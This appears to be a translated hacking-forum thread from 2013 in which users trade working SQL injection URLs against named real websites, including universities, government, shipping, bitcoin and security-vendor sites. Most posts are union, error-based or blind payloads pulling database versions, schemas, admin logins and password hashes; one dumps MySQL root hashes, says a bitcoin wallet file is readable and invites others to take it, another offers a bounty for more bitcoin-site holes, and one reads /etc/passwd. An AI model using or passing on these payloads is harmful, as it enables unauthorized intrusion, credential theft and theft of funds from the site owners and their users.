http://www.sport-trade.ru/out.php?id=9%27+union+select+1,2,3,4,5,6,7,8,9,10, 11+--+
Note: Same as the previous one.
Ask Alena)
TIC 750
traffic almost 10k
PHP:
http://www.tonnel.ru/kino.php?id=-245'+union+select+1,2,3,4,5,6,SQL,8,9+--+
version()-5.0.45
user()-tonel@localhost
database()-savinov
I stopped digging further
UP
pr 5
http://
www.hu.
edu
.pk
/viewfaculty.php?id=12'+union+select+concat_ws(0x3a ,version(),database(),user()),2,3,4,5,6,7,8,9,10,1 1,12,13,14+--+
=============================================
Code:
http://www.vvsforum.no/stilling.php?id=-134+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28--
Unknowhacker
15.10.2013, 18:45
Beta SQL
Code:
http://www.euraxess.hr/sitegenius/article.php?aid=-898+order+by+26+--+
http://www.narom.no/artikkel.php?aid=2&bid=-56+union+select+1,2,3,4,5,6+--+&oid=944
http://www.muzkom.net/afisha/show.php?aid=138+order+by+4+--+
http://www.piiter.ru/authors2.php?aid=36&pid=-629+union+select+1,2,3,version%28%29,5,6,7,8,9,10, 11,12,13,14,15,16+--+
http://www.yivoinstitute.org/library/index.php?aid=97tid=112+order+by+9+--+
http://mat-reshebnic.ru/primer.php?id=-14%27+union+select+1,2,version%28%29+--+
Code:
SHIVA LTD
http://www.shvidi.com/ru/product_list.php?action=company&typeID=9&id=-17+union+select+1,2,3,4,5,6,%28select%28@x%29from% 28select%28@x:=0x00%29,%28select%28null%29from%28d 60158493.users%29where%280x00%29in%28@x:=concat%28 @x,0x3c62723e,user_name,0x3a,user_pass%29%29%29%29 x%29,8+--+
Loki
http://www.lokiusa.com/product_list.php?cat=-3+union+select+1,%28select%28@x%29from%28select%28 @x:=0x00%29,%28select%28null%29from%28information_ schema.columns%29where%28table_schema!=0x696e666f7 26d6174696f6e5f736368656d61%29and%280x00%29in%28@x :=concat%28@x,0x3c62723e,table_schema,0x2e,table_n ame,0x3a,column_name%29%29%29%29x%29,3,4,5,6,7,8,9 ,10,11,12+--+
Win32BOT
17.10.2013, 19:27
Code:
http://www.catalystpics.co.uk/work.php?id=-7+union+select+1,2,3,4,5,6,7,concat_ws(0x3a ,version(),database(),user()),9,10,11,12,13,group_ concat(table_name),15+from+information_schema.tabl es+where+table_schema=database()+--+
Code:
http://www.irishsanghatrust.ie/news.php?id=-33+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18--
UP
http://
www.dakotaresidences.net
/dev/label.php?id=13+or+1+group+by+concat((select+versi on()),0x00,floor(rand(0)*2))having+min(0)+--+
=============================================
http://
www.shepperd-fox.co.uk
/client.php?id=99 || 1=2+union+select+1,2,3,4,insert(version(),1,0,inse rt(0x3a,1,0,database())),6,7+--+
=============================================
http://
www.ksymktg.com
/dev/label.php?id=(12)||(@:=1)group by concat(version(),@:=!@)having min(0)+--+
=============================================
http://encycl.anthropology.ru/article.php?id=1+union+select+1,version(),3,4,5,6, 7,8,9,10+--+
karcher.ru
2800 TIC, 9k traffic
http://www.karcher.ru/cms/templates/karcher2008/popupProduct.php?version=ru&versionID=224&language=ru-RU&username=&userID=4222&projecttype=karcher2008&pageID=1&pageIDsql=25930944&CatAlias=-13988060+union+select+1,2,3,4,version(),6,7,user() ,9,10+--+
http://www.spezrezerv.ru/index.php?cat=2%20union%20select+1,version()--
Win32BOT
25.10.2013, 20:37
Code:
http://www.me-doc.com.ua/index.php?id=-3543+union+select+1,2,concat_ws(0x3a ,version(),database(),user()),4,5,6,7,8,9,10,11,gr oup_concat(table_name)+from+information_schema.tab les+where+table_schema=database()+--+
Code:
http://limpopo-fishing.kz/index.php?tid=662+union+select+concat_ws(0x3a ,version(),database(),user()),2,group_concat(table _name),4,5+from+information_schema.tables+where+ta ble_schema=database()+--+
Code:
http://pushingpetals.com/buy.php?id=-55+union+select+1,concat_ws(0x3a ,version(),database(),user()),group_concat(table_n ame),4,5,6,7,8,9,10,11,12+from+information_schema. tables+where+table_schema=database()+--+
Code:
http://o-tula.net/o-server/check-in/protokol.php?id=-24+union+select+concat_ws(0x3a ,version(),database(),user())+--+
dobryiDyaDya
25.10.2013, 22:03
here:
http://xn----8sbaki6bhedrhug.xn--p1ai/gallery?GSID=2&level=2'
Win32BOT
26.10.2013, 00:14
Code:
http://helukabel.su/index.php?id=-68+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,group_concat(table_name),5,6,7,8,9,1 0,11+from+information_schema.tables+where+table_sc hema=database()+--+
Win32BOT
26.10.2013, 22:23
Code:
http://futuresfins.com/fin-detail.php?id=-173+union+select+concat_ws(0x3a,version(),database (),user()),group_concat(table_name),3,4,5,6,7,8,9, 10,11+from+information_schema.tables+where+table_s chema=database()+--+
Unknowhacker
28.10.2013, 13:11
Code:
http://www.domkultury.su/news.php?newsid=-41+union+select+1,2,%28select%28@x%29from%28select %28@x:=0x00%29,%28select%28null%29from%28informati on_schema.columns%29where%28table_schema!=0x696e66 6f726d6174696f6e5f736368656d61%29and%280x00%29in%2 8@x:=concat%28@x,0x3c62723e,table_schema,0x2e,tabl e_name,0x3a,column_name%29%29%29%29x%29,4,5,6+--+
http://www.biomedis.ru/news.php?newsId=-80+and+1=2+union+select+1,2,3,4,5,6+--+
http://www.trunov.com/news.php?newsid=-397+union+select+1,2,%28select%28@x%29from%28selec t%28@x:=0x00%29,%28select%28null%29from%28informat ion_schema.columns%29where%28table_schema!=0x696e6 66f726d6174696f6e5f736368656d61%29and%280x00%29in% 28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,tab le_name,0x3a,column_name%29%29%29%29x%29,version%2 8%29,5,6,7,8,9+--+&page=1
http://www.ipoteka.md/ru/news.php?NewsID=-483+union+select+1,%28select%28@x%29from%28select% 28@x:=0x00%29,%28select%28null%29from%28informatio n_schema.columns%29where%28table_schema!=0x696e666 f726d6174696f6e5f736368656d61%29and%280x00%29in%28 @x:=concat%28@x,0x3c62723e,table_schema,0x2e,table _name,0x3a,column_name%29%29%29%29x%29,3,4,5,6,7,8 ,9,10,11,12,13,14,15,16+--+
http://www.dia-m.ru/news.php?newsid=-147+union+select+1,2,3,4,5,6,7,8,9,10,11,12,%28sel ect%28@x%29from%28select%28@x:=0x00%29,%28select%2 8null%29from%28mysql.user%29where%280x00%29in%28@x :=concat%28@x,0x3c62723e,user,0x3a,password%29%29% 29%29x%29,14,15,16+--+
http://jewishmariupol.com.ua/news.php?newsid=-856+union+select+1,2,3,%28select%28@x%29from%28sel ect%28@x:=0x00%29,%28select%28null%29from%28ridnak rai_jewish.users%29where%280x00%29in%28@x:=concat% 28@x,0x3c62723e,username,0x3a,password%29%29%29%29 x%29,5+--+
http://www.mastergrisha.ru/news.php?newsid=-71+union+select+1,%28select%28@x%29from%28select%2 8@x:=0x00%29,%28select%28null%29from%28information _schema.columns%29where%28table_schema!=0x696e666f 726d6174696f6e5f736368656d61%29and%280x00%29in%28@ x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_ name,0x3a,column_name%29%29%29%29x%29,3,4+--+
http://www.servicesat.ru/news.php?newsid=-49+union+select+1,2,version%28%29,4,5+--+
http://www.consol.crimea.ua/news.php?newsid=338%27]Consol[/URL]
Business Center "Парус" (http://www.parus.biz/news.php?newsid=15+order+by+4+--+)
Code:
http://www.perthanddistrictanglersassociation.com/News.php?newsID=-87+union+select+1,2,3,4,concat_ws(0x3a,version(),u ser(),database()),6,7,8,9--
Sum.cogitans
29.10.2013, 08:32
You know, the morning got off to a good start right away, the mood is cheerful straight off.
Official site of Anfisa Chekhova:
Code:
www.achekhova.ru/img.php?id=-99+UNION+SELECT+1,2,3,group_concat(user(),0x3a,ver sion(),0x3a,database())+--+&rub=press
P.s. Look for the result in the source, or in the image URL.
P.p.s. The guys made a clever attempt to hide the error output. Use cmd+a\ctrl+a.
UPD Dug up the crawlp DB schema - URL (http://fernando.quiroga.free.fr/Tennis_backup/csclichytennisco.sql), the rest is up to you, and I have to get to work .)
As a bonus:
Code:
http://www.osnova-pc.ru/prosmotr_posta.php?id=-85'+UNION+SELECT+1,2,group_concat(user(),0x3a,vers ion(),0x3a,database()),4,5,6,7,8,9,10,11+--+
joomla
TIC\PR is junk
Traffic 2.5 per week
Positions in Yandex are interesting: http://pr-cy.ru/a/www.osnova-pc.ru
http://bitvisitor.com/v2/images/bitvisitor_large.png
http://bitvisitor.com/ - earn bitcoins for viewing sites
on the main page, in the Referer header
MySQL AND/OR time-based blind
GET / HTTP/1.1
User-agent: Vasya with IE
Host: bitvisitor.com
Referer: '||(SELECT 'TXIo' FROM DUAL WHERE 3847=3847 AND 4515=IF((QUARTER(NULL) IS NULL),SLEEP(1),4515) )||'
Connection: close
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
banner: '5.1.66-0+squeeze1-log'
current user: root
database management system users password hashes:
root [2]:
password hash: *AC3AC8E16952F531C8E9FE03ECD18DA0E0E771C7
password hash: *ED5785C53CE4F9F7A220427C0F14905F92E6695B
File_Priv=Y
LOAD_FILE('**********/.bitcoin/wallet.dat') is possible
the wallet holds half a bitcoin (~100$)
I didn't touch it, whoever wants to earn, go ahead
Unknowhacker
30.10.2013, 21:35
ТЕХНО-М
Code:
http://www.techno-m.ru/index.php?prod=93+order+by+8+--+
Hi-tec.com.ua
Code:
http://hi-tec.com.ua/index.php?idmainproduct=-91+union+select+1,2,%28select%28@x%29from%28select %28@x:=0x00%29,%28select%28null%29from%28hiteccomu a_kbt.kbt_user%29where%280x00%29in%28@x:=concat%28 @x,0x3c62723e,uname,0x3a,pass%29%29%29%29x%29,4,5, 6,7,8,9+--+
http://www.bitcoinlivebets.com/banner/468x60.jpg
time-based blind
http://www.bitcoinlivebets.com/index.php?action=livewetten&qf=%22%2b(select(0)from(select(sleep(6)))v)%2b%22&u=livebereich
bitcoins, there you go!
CONTEST: whoever posts the next vulnerability on a Bitcoin site gets 1 BTC ~ 197$ from me (start 31.10.13, end 02.11.13)
P.S. MANDATORY!!! The word bitcoin must be present in the site name.
www.igornikolaev.ru
Official site of Igor Nikolaev
PHP:
http://www.igornikolaev.ru/music/textout.php?id=94+or+1+group+by+concat((),0x00,flo or(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:130||PR:
==================================================
www.inconnect-group.ru
PHP:
http://www.inconnect-group.ru/pressrelease/?id=96+limit+0,0+union+select+1,2,3,4,,6,7,8,9--+
db 5 version
CY:700||PR:5
==================================================
www.agidis.ru
PHP:
http://www.agidis.ru/?id=98+or+1+group+by+concat((),0x00,floor(rand(0)* 2))having+min(0)+or+1--+
db 5 version
CY:30||PR:2
==================================================
www.landscrona.ru
PHP:
http://www.landscrona.ru/tales/index.php?id=115+limit+0,0+union+select+1,2,,4,5,6 ,7,8,9,10,11,12,13,14,15,16--+
db 5 version
CY:450||PR:4
==================================================
CY - 120
PR - 5
Output goes into the page source; search for the delimiter ~|~
tarasovka.ukrmisto.net/company.php?id=999999.9'+union+select+(select+conc at(concat_ws(0x7e7c7e,users.id,users.login,users.p assword))+from+`ukrmisto_misto`.users+where+users. id=1),0x7c,0x7c,0x7c,0x7c,0x7c,0x7c,0x7c,0x7c,0x7c ,0x7c,0x7c,0x7c +--+
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Code:
http://www.northernoutpost.com/news.php?id=13+AND+1=2+UNION+SELECT+1,2,3,version% 28%29,5,6,7,8+--+
Code:
http://www.almarecords.com/news.php?id=39+AND+1=2+UNION+SELECT+1,2,version%28 %29,4,5,6,7,8,9,10,11+--+
Hotel booking:
http://glenavonhotel.co.uk/offer_one.php?id=999999.9'+union+select+0x7c,0x7c, 0x7c,0x7c,0x7c,0x7c,0x7c,0x7c,0x7c,0x7c,0x7c,(sele ct+concat(group_concat(table_name))+from+informati on_schema.tables+where+table_schema='andycameron') ,0x7c,0x7c,0x7c,0x7c,0x7c --+
palec2006
03.11.2013, 20:58
Security systems))
http://www.aktivsb.ru/price_new.php?catid=-1+union+all+select+1,2,(select+group_concat(concat (unhex(Hex(cast(managers.login+as+char))),0x3A),un hex(Hex(cast(managers.passwd+as+char)))+SEPARATOR+ 0x3C6272202F3E)+from+`aktivsb`.managers),4,5,6--
db:5.5.31
CY:1000
PR:4
Traffic: 10k
the mail account deserves attention.
Code:
http://www.pangeaday.org/filmDetail.php?id=-47+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),user(),database()),8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23--
http://www.lukoil.ro/statii.php?id=-232+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat_ws (0x3a,version(),user(),database()),4,5,6,7,8,9,0,1 ,2,3,4,5,6,7,8,9+--+
pr:4
http://
www.colawp.com
/database/cola.php?cola_id=254 and if(substring(version(),1,1)=5,sleep(5),0)
pr:4
http://
www.hotelvilladelrio.com
/en/oferta.php?id=2+and+1=2+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,version(),15,16,17,18,19,20,21,22 ,23,24+--+
pr:7
http://
www.depkes.go.id
/index.php?vw=2&id=SNR.13100010' and (select 1 from (select count(*),concat((select password from jos_users where username like 0x61646d696e),0x3a,floor(rand(0)*2))x from information_schema.tables group by x)a)+--+
Unknowhacker
07.11.2013, 20:46
http://avtodvornik.com.ua/?ID=goods&select=8+order+by+2+--+
Unknowhacker said:
http://avtodvornik.com.ua/?ID=goods&select=8+order+by+2+--+
Read the 2nd paragraph of the 1st point of this thread's rules.
Try to "see through to the end" the injections you find.
www.avtodvornik.com.ua/?ID=goods&select=8 and (select 1 from(select count(*),concat(version(),0x3a,floor(rand(0)*2))x from information_schema.tables group by x)a)+--+
upd
www.avtodvornik.com.ua/?ID=goods&select=8 and (select 1 from(select count(*),concat((select unhex(hex(cast(pass as char))) from admins),0x3a,floor(rand(0)*2))x from information_schema.tables group by x)a)+--+
Code:
http://www.asmube.com.br/noticias.php?id=-11+union+select+concat_ws(0x3a,version(),user(),da tabase()),2,3,4,5,6,7/*
Code:
http://www.licafusa.com.br/galeriadoscampeoes.php?id=-2+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4--
Code:
http://www.noborder.org/item.php?id=-383+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27--
pr:7
TIC:30
http://
www.namibian.com.na
/indexx.php?id=5101+union+select+1,2,3,concat_ws(0x 3a,password,email),5,6,7,8,9 from users+--+&page_type=story_detail&category_id=3
pr:4
http://
www.poetv.com
/video.php?vid=127816+and+(if(ascii(mid((version()) ,1,1))=53,0,1))+--+
pr:3
http://
www.apisa.info
/politica.php?id=1'and(select+1+from(select+count(* ),concat((select+version()),0x00,floor(rand(0)*2)) x+from+information_schema.tables+group+by+x)a)--+
Unknowhacker
11.11.2013, 19:54
Code:
http://www.rusderjavnaya.info/article.php?art_id=758+and+1=0+union+select+1,vers ion%28%29+--+
Code:
http://www.diavia.ru/index.php?art_id=-6997+union+select+1,2,3,version%28%29,5,6,7+--+&p_id=6894&PHPSESSID=25e142491b9349684dbe1cb0c7216bdd
4.0.26-log
Host:
_http://dumskaya.net
Injection:
Code:
http://dumskaya.net/post/-1%27+or+1=if(substr((@@version),1,1)=5,1,2)+--+/
version() = 5.01
TYC = 1000
PR = 5
http://www.kdoexpo.com/cadeau-cadre-photo-numerique-pfx-1000.php?id=199+UNION+SELECT+1,2,concat_ws(0x3a,ve rsion(),database(),user()),4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47,48,49,50,51,52,53,54,55+LIMIT+1,1--
4.0.25-standard-log:kdoexpo:kdoexpo@10.0.84.190
Code:
http://www.spbf.pt/article.php?sid=-15+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6--
5.0.96-community:spbfuser_spbf765@localhost:spbfuser_spbf site
DezMond™
20.11.2013, 15:45
PR7
http://www.polimi.it/index.php?id=3351&uid=131&k_cf=10&annoAA=2012'&L=0&k_corso_la=-1139+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24+--+
Code:
http://www.italyfutbol.ru/rubrika.php?id=-11+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5--
kingbeef
22.11.2013, 07:01
http://www.ssangyong.by/ru/pages/index.php?id=27-9.999+union+select+1,2,3,4,5,6,version(),8,9,10,11 ,12,13,14,15,16,17,18,19,20--
Argentine
Code:
http://www.cdh-protesis.com.ar/sitio/item.php?idcd=-37+union+select+1,concat_ws(0x3a,version(),user(), database()),3,0x4861636b6564206279205365706f,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18--
Code:
http://www.elgalponrosario.com.ar/sitio/item.php?idcd=115&cat=-15+union+select+1,concat_ws(0x3a,version(),user(), database()),3--
Code:
http://www.metalurgicavaldez.com.ar/sitio/item.php?idcd=201&cat=-1460+union+select+1,concat_ws(0x3a,version(),user( ),database()),3--
http://
www.maffeistefano.it
/politica.php?id=12+and+1=2+union select 1,version(),3,4,5,6,7,8,9,10,11+--+
===========================================
http://
www.zontahkeast.org
/en/service/service.php?id=-4+union+select+1,2,version(),4+--+
===========================================
http://
www.residences-botanique.com
/Dev3/label.php?id=13+or+1+group+by+concat((select+versi on()),0x00,floor(rand(0)*2))having+min(0)+--+
===========================================
pr:4
http://
www.gemer.org
/clanok.php?chlan=eng&id=7'+union+select+version()+--+&akcia=
===========================================
http://
www.ulsa.es
/oferta.php?id=-000000001P'+union+select+1,2,3,4,5,6,version(),8,9 ,10,11,12,13,14+--+
===========================================
http://
www.dbrush.net
/sub-equipment.php?SID=27&SID2=-2'+union+select+1,2,3,4,5,6,7,8,version(),10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45, 46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 ,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,7 9,80,81,82,83,84,85,86,87,88,89,90,91,92,93+--+
===========================================
http://
www.aquarius.com.sg
/service.php?id=1+and+1=2+union+select+1,concat_ws( 0x3a,user_name,user_password),3,4,5 from user+--+
===========================================
Code:
http://www.orsna.gov.ar/usuarios/capitulosleyconsumidor.asp?cod=5'+or+1=(select+db_ name())--
Code:
http://www.orsna.gov.ar/usuarios/capitulosleyconsumidor.asp?cod=5'+or+1=(select+sys tem_user)--
Code:
http://www.orsna.gov.ar/usuarios/capitulosleyconsumidor.asp?cod=5'+or+1=(SELECT+TOP +1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
Code:
http://www.orsna.gov.ar/usuarios/capitulosleyconsumidor.asp?cod=5'+or+1=(SELECT+TOP +1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE +TABLE_NAME+NOT+IN+(SELECT+TOP+1+TABLE_NAME+FROM+I NFORMATION_SCHEMA.TABLES))--
you're on your own from here; there are a lot of databases, and each one has that many tables squared...
Unknowhacker
25.11.2013, 21:35
OAO "Novorossiysk Shipping Company" SCF Novoship
Code:
http://www.novoship.ru/info-view.php?id=115%27+union+select+1,2,3,concat_ws%28 0x3a,name,pass%29,5,6,7,8,9,10,11,12,13,14,15+FROM +nov_users+--+
Note: Admin panel (http://www.novoship.ru/cpanel.php) - profit!
DeepBlue7
28.11.2013, 05:15
Code:
http://www.foxflannel.com/memories-article.php?id=1'+union+select+1,concat_ws(0x3f,ta ble_name,version()),3,4,5,6,7+from+information_sch ema.tables+limit+50,1+union+select+1,2,3,4,5,6,7--'
// Rules violation: reread /showpost.php?p=2966352&postcount=5 (https://antichat.live/showpost.php/p/2966352/postcount/5/) and try not to break the rules again
// BigBear
Code:
http://www.marvista.net/programing-catalog.php?id=350&cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,co ncat_ws(0x3a,version(),user(),database()),16,17,18 ,19,20,21,22,23,24,25,26,27,28--
Ctrl+U --> Line 148 --> 5.0.96-log:marvistadb@97.74.144.231:marvistadb
t3cHn0iD
29.11.2013, 18:44
movieline.ru/auth.php
In the nickname field, enter:
Code:
") or ("a"="a
Code:
http://www.desdetupc.com.ar/sitio/item.php?idcd=248&cat=-0+union+select+concat_ws(0x3a,version(),user(),dat abase()),2,3,4,5,6,7,8,9,10,11,12,13--
Code:
http://www.ibopeplus.com.ar/item.php?tabla=nutricion&id=-5+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7--
Code:
http://polimiel.com.ar/sitio/item.php?idcd=-18+union+select+1,concat_ws(0x3a,version(),user(), database()),0x4861636b6564206279205365706f,4,5,6,7 ,8,9,10,11,12,13,14&cat=7
DezMond™
03.12.2013, 17:43
PR5
http://www.dlrg.de/gr/lernen/lehrgaenge.html?tx_pagephpcontent_pi1%5BSEM_NR%5D=-23151-13'+UnIOn/**//**//**//**/+/**//**//**//**//**//**//**//**//**//**//**/sELeCt+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+fro m+information_schema.tables+--+
TIC: 1200
Pr: 3
http://
www.biysk.ru
/print.phtml?news=on&id=258+and+1=(if(ascii(substr(@@version,1,1))=53,1 ,0))+--+
===============================================
Code:
http://www.cardon.com.ar/nota.php?id=-184+union+select+1,2,3,4,5,6,7,8,0x4861636b6564206 279205365706f,10,concat_ws(0x3a,version(),user(),d atabase()),12,13,14--
Code:
http://www.isca.org.ar/nav_notas.php?id=-71+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),user(),database()),0x4861636b656420627920536570 6f,9,10,11,12,13,14,15--
Code:
http://lacupulagaleria.com.ar/sitio/evento.php?id=-21+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,0x4861636b6564206279205365706f--
University of Tennessee System
Dept. of Civil & Environmental Engineering
Code:
http://cee.utk.edu/announcements/details.php?id=-15+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),user(),database()),8,9,10,11,0x4861636b65642062 79205365706f,13,14,15--
psihoz26
06.12.2013, 05:19
Code:
http://videogames.eprst.ru/news.php?id=321169.9+union+select+concat(user(),0x 3a,file_priv),2,load_file(0x2f6574632f706173737764 )+from+mysql.user+where+user=0x6e657773+--+
Code:
http://www.cruzroja.org.ar/new/noticia.php?id=188&cat=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,0x4861636b6564206279205365706f,5,6,7, 8,9,10,11,12--
Code:
http://www.riehr.com.ar/detalleEdu.php?id=-6+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),0x4861636b6564206279205365706f,4,5,6,7, 8,9,10,11,12,13,14,15--
Code:
http://www.redfuv.org.ar/boletin_amp.php?id=-58+union+select+1,2,0x4861636b6564206279205365706f ,4,concat_ws(0x3a,version(),user(),database()),6--
Inspired by this (https://antichat.live/showthread.php/p/3632636/) thread.
I know there aren't that many infosec companies.
But even they were a disappointment.
Shame on you, gentlemen, and you've been in business since 2004 =(
Inject
Code:
http://chart.av-comparatives.org/awards_by_vendor.php?venID=2+and+substr((@@version ),1,1)=5
Blind. MySQL 5 branch.
TIC 400
Pr 6
Code:
http://www.calidus.ro/en/news.php?id=-2+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,0x4861636b6564206279205365706f--
Code:
http://www.casopisveronica.cz/rubrika.php?idr=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4--
Code:
http://www.teatro-elcirculo.com.ar/item.php?iditem=-69+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7,8,9,10,11,12,13,14,15,16/*
nemaniak
08.12.2013, 00:47
retailmagazine.ru TIC-475 PR-5 blind
Code:
http://retailmagazine.ru/tofirmcard.php?num=1573+and+5=substring(version(), 1,1)+--+
Code:
http://retailmagazine.ru/tofirmcard.php?num=1573+and+4=substring(version(), 1,1)+--+
learning.pmi.org PR-5
Code:
http://learning.pmi.org/course-detail.php?id=-2018+UNION+SELECT+1,concat_ws(0x3a,version(),user( ),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+--+
Code:
5.0.96-log:pmiprof@184.168.193.190:pmiprof
reps.ru TIC-200
Code:
http://reps.ru/print.php?news=-2640'+union+select+1,2,3,4,concat_ws(0x3a,version( ),user(),database()),6,7,8,9,0,11,12,13,14+--+
Code:
5.5.29-MariaDB-log:repsru@rslocal:repsru